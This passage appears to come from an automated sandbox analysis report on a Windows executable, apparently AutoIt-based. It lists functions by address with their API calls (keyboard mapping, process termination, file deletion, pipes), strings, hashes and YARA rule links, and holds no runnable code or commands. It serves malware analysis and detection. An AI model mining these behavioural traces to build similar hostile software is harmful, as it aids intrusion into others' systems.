                                                    • ReleaseDC.USER32 ref: 0041BC98
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041BCAF
                                                    • MulDiv.KERNEL32(000009EC,?,00000008), ref: 0041BCC1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 1c68ace6c27fe22c0c1c24a4264366f85ed3c90c8cf5a59530c7912de1d81c4f
                                                    • Instruction ID: c162c83f7d6a1f2a1353980164e7ba76f7fc8c984ba79f1aee02db59ff8975d5
                                                    • Opcode Fuzzy Hash: 1c68ace6c27fe22c0c1c24a4264366f85ed3c90c8cf5a59530c7912de1d81c4f
                                                    • Instruction Fuzzy Hash: 770184B6A00208BFEB109BE19D49EAF7F7CEB453A5F00407BFA04A6290D6315C05CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C19A, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C135C
                                                      • Part of subcall function 003C12F3: BeginPath.GDI32(?), ref: 003C1373
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    • MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 0044C1C4
                                                    • LineTo.GDI32(00000000,?,00000000), ref: 0044C1D8
                                                    • MoveToEx.GDI32(00000000,?,-00000002,00000000), ref: 0044C1E6
                                                    • LineTo.GDI32(00000000,?,00000003), ref: 0044C1F6
                                                    • EndPath.GDI32(00000000), ref: 0044C206
                                                    • StrokePath.GDI32(00000000), ref: 0044C216
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: d60981dcb2eefd3c8bf2f4c25212962d13f9f6115f39efc76d1c7de246045892
                                                    • Instruction ID: 932e77fbd543e65b742a28c8df0d6d76c9061e5508293436205e6958b55f0cec
                                                    • Opcode Fuzzy Hash: d60981dcb2eefd3c8bf2f4c25212962d13f9f6115f39efc76d1c7de246045892
                                                    • Instruction Fuzzy Hash: 26110C7640015CBFEB119F90DC88FAA3F6DEB05394F048465F91849161C7729D59DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E03A2, Relevance: 9.0, APIs: 6, Instructions: 45keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B), ref: 003E03D3
                                                    • MapVirtualKeyW.USER32(00000010), ref: 003E03DB
                                                    • MapVirtualKeyW.USER32(000000A0), ref: 003E03E6
                                                    • MapVirtualKeyW.USER32(000000A1), ref: 003E03F1
                                                    • MapVirtualKeyW.USER32(00000011), ref: 003E03F9
                                                    • MapVirtualKeyW.USER32(00000012), ref: 003E0401
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: e4c61cfb401498723b53d5b492cf135cf1fac9c44382f076fef6dc4b2f00a5da
                                                    • Instruction ID: b84b34de5dce582fec9b36a26545d5f9940df62a2eddc3babc0398671d0c62ad
                                                    • Opcode Fuzzy Hash: e4c61cfb401498723b53d5b492cf135cf1fac9c44382f076fef6dc4b2f00a5da
                                                    • Instruction Fuzzy Hash: C1016CB0906B5A7DE3008F6A8C85B57FFA8FF45354F00421BE15C47941C3B5A868CBE9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042568B, Relevance: 9.0, APIs: 6, Instructions: 44windowtimethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010), ref: 0042569B
                                                    • SendMessageTimeoutW.USER32 ref: 004256B1
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 004256C0
                                                    • OpenProcess.KERNEL32(001F0FFF,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256CF
                                                    • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256D9
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 004256E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 5c52fc533b3cc3a383353e7e86e6eb3f68042e491160e04e46f773155687815f
                                                    • Instruction ID: 173fdd6a141582da09f0871ea5d203ff57c35435fbfdb26dcc8f29259ab7230e
                                                    • Opcode Fuzzy Hash: 5c52fc533b3cc3a383353e7e86e6eb3f68042e491160e04e46f773155687815f
                                                    • Instruction Fuzzy Hash: 73F01D36241558BBE6215BA6EC0DEEF7F7CEFC7B11F000179F604910519AA11A05C6B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004274D2, Relevance: 9.0, APIs: 6, Instructions: 34synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 004274E5
                                                    • EnterCriticalSection.KERNEL32(?,?,003D1044,?,?), ref: 004274F6
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,003D1044,?,?), ref: 00427503
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,003D1044,?,?), ref: 00427510
                                                      • Part of subcall function 00426ED7: CloseHandle.KERNEL32(00000000,?,0042751D,?,003D1044,?,?), ref: 00426EE1
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00427523
                                                    • LeaveCriticalSection.KERNEL32(?,?,003D1044,?,?), ref: 0042752A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 44518cf3fb42757a570bc8940a9569219eaeccae4775a4b1803feab63286fca4
                                                    • Instruction ID: fb1515a91b93dfa17f19e2f7c542edbc6202dcb761f8c163267767e9011a4974
                                                    • Opcode Fuzzy Hash: 44518cf3fb42757a570bc8940a9569219eaeccae4775a4b1803feab63286fca4
                                                    • Instruction Fuzzy Hash: 41F0897E144B12EBE7111B64FC4C9DB7B79FF46312B400572F102904B0CB765445CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418E74, Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00418E7F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00418E8B
                                                    • CloseHandle.KERNEL32(?), ref: 00418E94
                                                    • CloseHandle.KERNEL32(?), ref: 00418E9C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00418EA5
                                                    • HeapFree.KERNEL32(00000000), ref: 00418EAC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                                                    • Instruction ID: 31a27faa56cc57cec5e58d63ca4e9026a37862f61046b8bcedf47ae97ad442b4
                                                    • Opcode Fuzzy Hash: 180f1d3d97952489b2a460c2afcb65e722a0986b32613118e38ea533ae461374
                                                    • Instruction Fuzzy Hash: 97E0757A104505FBDB011FE5EC0C95ABFB9FF8A762B508631F619C1470CB32A869DB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00439A72, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00417652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041766F
                                                      • Part of subcall function 00417652: ProgIDFromCLSID.OLE32(00000000,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041768A
                                                      • Part of subcall function 00417652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 00417698
                                                      • Part of subcall function 00417652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176A8
                                                    • CoInitializeSecurity.OLE32(?,000000FF,?,?,00000002,00000003,?,?,?,?,?,?), ref: 00439B1B
                                                    • CoCreateInstanceEx.OLE32(?,?,00000015,?,00000001,?), ref: 00439C97
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00439CF0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FromProg$CreateFreeInitializeInstanceSecurityTasklstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 375401485-2785691316
                                                    • Opcode ID: c7d768e8f40827318aa438b6827ec7c59f4daea659b26fdb8c2f1cfd5f194393
                                                    • Instruction ID: 18e652e9e619a051782ae2460e9de98f0e97404e86d2aa719d4f1f0361b4eb38
                                                    • Opcode Fuzzy Hash: c7d768e8f40827318aa438b6827ec7c59f4daea659b26fdb8c2f1cfd5f194393
                                                    • Instruction Fuzzy Hash: 02914871D00228ABDB11DFA5DC85EDEBBB8EF08310F20415AF519AB281DB756E45CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438902, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00438928
                                                    • CharUpperBuffW.USER32(?,?), ref: 00438A37
                                                    • VariantClear.OLEAUT32(?), ref: 00438BAF
                                                      • Part of subcall function 00427804: VariantInit.OLEAUT32(00000000), ref: 00427844
                                                      • Part of subcall function 00427804: VariantCopy.OLEAUT32(?,00000000), ref: 0042784D
                                                      • Part of subcall function 00427804: VariantClear.OLEAUT32(?), ref: 00427859
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: 251b1036227e99c6659ac613002176fa9932da11ee5f04a4265f23625b158759
                                                    • Instruction ID: e6026a6c5a059052d827b30ebfaf2aa9e08bb9b7b7112b1a7c4ee058a7cbe007
                                                    • Opcode Fuzzy Hash: 251b1036227e99c6659ac613002176fa9932da11ee5f04a4265f23625b158759
                                                    • Instruction Fuzzy Hash: AB917A756083029FC700DF25C484A5BFBE4AF89714F14896EF89A8B362DB34ED46CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043DAB9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0043DAD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 2358735015-567219261
                                                    • Opcode ID: 27cb18a46760707ad1f7a1565939fa2f48770fd59a3c3ed68a88d186b97a8508
                                                    • Instruction ID: 0369a79a2ba35b26f6159f3893ad91a1253ae6ca5f2d8e7a1710ffdd763f43af
                                                    • Opcode Fuzzy Hash: 27cb18a46760707ad1f7a1565939fa2f48770fd59a3c3ed68a88d186b97a8508
                                                    • Instruction Fuzzy Hash: 02318071900219AFCB11EFA4DC81DEBB3B4FF05360B108A2AE465AB6D1CB75B905CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004193F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00419409
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00419439
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 787153527-1403004172
                                                    • Opcode ID: 2e095f86d9d7e22086bdc1e313509ec625893640f04d6a47a614fd218fc67993
                                                    • Instruction ID: b9a86f365804fcf2fd3e21955c6ce63a3c0836581408fb3794e053a8353579d7
                                                    • Opcode Fuzzy Hash: 2e095f86d9d7e22086bdc1e313509ec625893640f04d6a47a614fd218fc67993
                                                    • Instruction Fuzzy Hash: D321E6729051087EEB15ABA0DC86DFF776CDF063A0B10412EF525961E0DB391D8A9B24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042710C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,0043FC6D,?), ref: 0042712B
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,0043FC6D,?), ref: 0042715D
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,0043FC6D,?), ref: 0042716E
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004271A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 38bd4b805c94129d4286abd8b365bff79b6c8dadd178c7046af22eb2aaeb55cf
                                                    • Instruction ID: 7fc0a4bd6c800d2d8e4412fb5f8e5f4269dc4ca7ce87cb356246c50a7b52bf90
                                                    • Opcode Fuzzy Hash: 38bd4b805c94129d4286abd8b365bff79b6c8dadd178c7046af22eb2aaeb55cf
                                                    • Instruction Fuzzy Hash: E021B275604225ABDB209F64AC04EBBB7A8EF52370F600A1BF9E0D33D0D6759851C768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446656, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • SendMessageW.USER32(00000000,00000467,?,?), ref: 004466D0
                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 004466D7
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004466EC
                                                    • DestroyWindow.USER32(?,?,?,?,?,SysAnimate32,?,?,?,?,?,?,?,?), ref: 004466F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 5c8267d35c67f0540632afe0c2645cdc47671d18398fb4771355ace54f27edd9
                                                    • Instruction ID: d1edd7b09570d5e5af68a43c955abf04087c48826590343cc372349c1e124158
                                                    • Opcode Fuzzy Hash: 5c8267d35c67f0540632afe0c2645cdc47671d18398fb4771355ace54f27edd9
                                                    • Instruction Fuzzy Hash: 6A215E71100205BAFF104FA4EC81EBB77ADEB57368F13462AF95192290C7798C51976A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042703E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C,00000001,?,?,0043FC38,?), ref: 0042705E
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000001,00000001,?,?,0043FC38,?), ref: 00427091
                                                    • GetStdHandle.KERNEL32(0000000C,00000001,?,?,0043FC38,?), ref: 004270A3
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000001,?,?,0043FC38,?), ref: 004270DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 0ea95498cb583a7feb5b65d0721474fbcdfacbc9aeaa3bc7156a6e748ef6537e
                                                    • Instruction ID: b43bfcb7048fc6340af26e86f30804202b1f76dce1b35cec106d2dcee32ee2bb
                                                    • Opcode Fuzzy Hash: 0ea95498cb583a7feb5b65d0721474fbcdfacbc9aeaa3bc7156a6e748ef6537e
                                                    • Instruction Fuzzy Hash: 9721A375704225ABDF209F74EC05A9A7BA4FF45320F604A6BF9A0D72D0D7759808CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422017, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00422048
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: d56e0489f536ae389679f800a845dcbc2de7b8e0ca01d308f255f85d66bd652a
                                                    • Instruction ID: a42b843a36c78b67e392e8006f894d8c9d62d78a3010b829ad793ef7ed8578b4
                                                    • Opcode Fuzzy Hash: d56e0489f536ae389679f800a845dcbc2de7b8e0ca01d308f255f85d66bd652a
                                                    • Instruction Fuzzy Hash: 6211A130900129DFCF00EFA4D9409EEB3B0FF15300B90856AD955AB391DB726D0ACB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004293DF, Relevance: 7.8, APIs: 5, Instructions: 339fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,-00002474,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004296DC
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 00429785
                                                    • CopyFileW.KERNEL32(?,?,?,-00002474,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042979B
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004297AC
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004297BE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: File$Delete$Copy
                                                    • String ID:
                                                    • API String ID: 3226157194-0
                                                    • Opcode ID: 5785bd7b1e1a16118f2deef0d754ccc9937ed187c33368b3dd4a92f26792bc5d
                                                    • Instruction ID: 5008f6476ff7410cd5775c76564029a3cbd4e4d2e646f799cb65bfa4162b22bf
                                                    • Opcode Fuzzy Hash: 5785bd7b1e1a16118f2deef0d754ccc9937ed187c33368b3dd4a92f26792bc5d
                                                    • Instruction Fuzzy Hash: C1C13AB2900129AEDF11DF95DC85EDFBBBCEF45310F5041AAF208E6141DB74AA848F69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003FAEE3, Relevance: 7.8, APIs: 5, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003FB1B6,?,?,?,00000000,00000000,00000000,?,00000000,00000000), ref: 003FAF92
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,?,?,?,?,003FB1B6,?,?,?,00000000,00000000,00000000,?), ref: 003FB00C
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?,00000000,00000000), ref: 003FB087
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?), ref: 003FB0A0
                                                      • Part of subcall function 003E594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,?,?,?,?,003E1013,?), ref: 003E598F
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,?,00000000,?,?,?,?,003FB1B6,?,?,?), ref: 003FB11D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
